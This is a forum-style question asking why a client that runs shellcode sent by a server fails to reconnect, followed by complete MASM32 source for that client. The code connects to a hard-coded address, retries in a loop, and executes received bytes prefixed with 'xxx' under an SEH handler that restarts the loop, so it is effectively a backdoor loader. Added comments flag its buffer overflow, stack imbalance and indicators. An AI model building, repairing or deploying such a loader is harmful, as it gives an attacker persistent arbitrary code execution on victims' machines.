汇编客户端执行服务器发送的shellcode代码 为什么服务器断开连接了不会重新连接?
; MASM32 source, 32-bit flat model, stdcall. The first line reads as the two
; directives ".386" and ".model flat,stdcall" fused onto one line (presumably a
; lost line break when the code was posted); MASM expects them separately.
.386.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
include wininet.inc
include advapi32.inc
include masm32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
includelib wininet.lib
includelib advapi32.lib
includelib masm32.lib
.data
szMutex db "_Me?",0 ; fixed mutex name used by FZX as a single-instance guard - a host-based indicator of this sample
szIP db "192.168.1.102",0 ; hard-coded server address - a network indicator of this sample
port db "4410",0 ; hard-coded server port as text; parsed with atodw in _LJ
.data?
hMutex dd ? ; written by FZX
hInstance dd ? ; written by FZX, never read in this file
server SOCKET ? ; the connected socket, written by _LJ and read by _PD
lpBuffer db ? ; ONE byte, yet _PD passes 1024 to recv for it - the receive overruns past the end of this section
.code
.code
;-----------------------------------------------------------------------
; cc - installed by _PD as the SEH frame handler (push cc / mov fs:[0],esp).
; It does not return an EXCEPTION_DISPOSITION; it jumps straight into _PD,
; so after an exception in the received code the receive loop appears to be
; re-entered from inside the exception dispatcher, with the handler's
; arguments (exception record, frame, context) never examined.
;-----------------------------------------------------------------------
cc proc; SEH handler - see _PD
jmp _PD; restart the receive loop instead of returning a disposition
cc endp
;-----------------------------------------------------------------------
; _xxx - transfers control to the received bytes: calls lpBuffer+3, i.e.
; whatever followed the 3-byte "xxx" prefix that _PD checked.
; In:    lpBuffer (global, .data?) filled by recv in _PD
; Clobb: eax, plus whatever the called bytes touch
; Note:  lpBuffer is in an uninitialised-data section, so this only works if
;        that section is executable - exactly the data-as-code execution a
;        DEP/NX policy is meant to stop.
;-----------------------------------------------------------------------
_xxx proc
xor eax,eax ; redundant: eax is fully rewritten by the lea below
lea eax,[lpBuffer+3] ; skip the "xxx" header
call eax ; execute the received data in place
ret
_xxx endp
;-----------------------------------------------------------------------
; FZX - single-instance guard and entry into the connect loop.
; Creates the named mutex szMutex with initial ownership; if it already
; exists the process exits at once, otherwise it waits 1 s, runs _LJ and
; releases the mutex. Every path ends in ExitProcess; the trailing ret is
; unreachable.
; Clobb: eax, plus whatever _LJ clobbers
;-----------------------------------------------------------------------
FZX proc; prevents a second instance from running
invoke GetModuleHandle,NULL
mov hInstance,eax ; stored but not read anywhere in this file
invoke CreateMutex,NULL,TRUE,offset szMutex ; TRUE = request initial ownership
mov hMutex,eax
invoke GetLastError ; fetch the last error code
cmp eax,ERROR_ALREADY_EXISTS ; another instance already owns the mutex
jz @F ; -> exit without connecting
invoke Sleep,1000
call _LJ ; _LJ re-enters itself with JMP and its ret is unreachable, so this call is not expected to return
invoke ReleaseMutex,hMutex ; release the mutex only after a normal run
@@:
invoke ExitProcess,0
ret
FZX endp
;-----------------------------------------------------------------------
; _PD - receive loop: reads from `server` into lpBuffer and, when the data
; starts with "xxx", installs cc as the SEH handler and calls _xxx to run
; the bytes after the prefix.
; In:    server (global) = connected socket; lpBuffer (global) = receive area
; Out:   nothing meaningful; the loop is left only when recv reports
;        SOCKET_ERROR
; Note:  pushad/popad do not balance: one pushad at entry, a popad at the end
;        of EVERY iteration, and another popad after the loop. From the second
;        iteration on, popad pops stack contents that pushad never saved.
; Note:  the SEH frame pushed inside the loop is never unlinked from fs:[0].
;-----------------------------------------------------------------------
_PD PROC
pushad
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; loop handling commands from the server
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.while TRUE
invoke RtlZeroMemory,addr lpBuffer,sizeof lpBuffer ; sizeof lpBuffer is 1 (declared "db ?"), so only one byte is cleared
invoke recv,server,addr lpBuffer,1024,0 ; up to 1024 bytes written into a 1-byte variable - overruns whatever follows it
.break .if eax==SOCKET_ERROR ; only a socket error leaves the loop; a 0 return (peer closed the connection) is not distinguished here
.if lpBuffer=="x"; lpBuffer holds the received command
.if [lpBuffer+1]=="x"
.if [lpBuffer+2]=="x"; if the 3-byte header is "xxx", run the payload that follows it
push cc ; cc becomes the handler of the new SEH frame
assume fs:nothing
push dword ptr fs:[0] ; previous frame pointer
mov dword ptr fs:[0],esp ; link the new frame at the head of the SEH chain; nothing ever restores fs:[0]
call _xxx
.endif
.endif
.endif
popad ; runs on every iteration but pairs with the single pushad only on the first pass
.endw
popad
_PD endp
;-----------------------------------------------------------------------
; _LJ - connect to the hard-coded server (szIP:port), hand the socket to
; _PD, and when _PD returns tear the socket down and start over.
; In:    szIP, port (globals, .data)
; Out:   server (global) = the socket; eax is undefined on the unreachable ret
; Clobb: eax and whatever the Winsock calls / _PD clobber
; Note:  the restart is "JMP _LJ", not a call, so the frame prologue MASM
;        emits for the locals runs again on every pass while the matching
;        epilogue never runs; the ret after the jump is unreachable.
; Note:  none of WSAStartup, WSASocket, gethostbyname is checked for failure.
;-----------------------------------------------------------------------
_LJ proc; connect to the server
local @stData:WSADATA
local @temp:SOCKET ; unused
local @stAddr:sockaddr_in
local @dwRecv,ThreadId4 ; unused
invoke WSAStartup, 101h, addr @stData ; Winsock 1.1; return value ignored
invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0
mov server, eax ; INVALID_SOCKET is not checked here
mov @stAddr.sin_family, 2 ; 2 == AF_INET (magic number; AF_INET itself is used on the line above)
invoke atodw, addr port ; port text -> dword (masm32 helper)
invoke htons, eax
mov @stAddr.sin_port, ax
invoke gethostbyname, addr szIP
mov eax, [eax+12] ; hostent.h_addr_list (offset 12 on 32-bit); a NULL result is dereferenced unchecked
mov eax, [eax] ; first entry of h_addr_list
mov eax, [eax] ; the IPv4 address itself
mov @stAddr.sin_addr, eax
kkk:
invoke connect,server,addr @stAddr,sizeof @stAddr
.if eax==SOCKET_ERROR
invoke Sleep,10000 ; 10 s back-off, then retry connect on the same socket
jmp kkk; reconnect if the connection failed
.endif
CALL _PD; process received commands
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.if server!=INVALID_SOCKET
invoke closesocket,server
.endif
invoke WSACleanup
mov eax,TRUE ; immediately overwritten by the Sleep call below
invoke Sleep,10000
JMP _LJ; reconnect if the server dropped the connection (re-runs the prologue - see header note)
ret
_LJ endp
start: ; program entry point (named by "end start")
call FZX ; FZX always ends in ExitProcess, so control does not come back here
invoke ExitProcess,0
ret
end start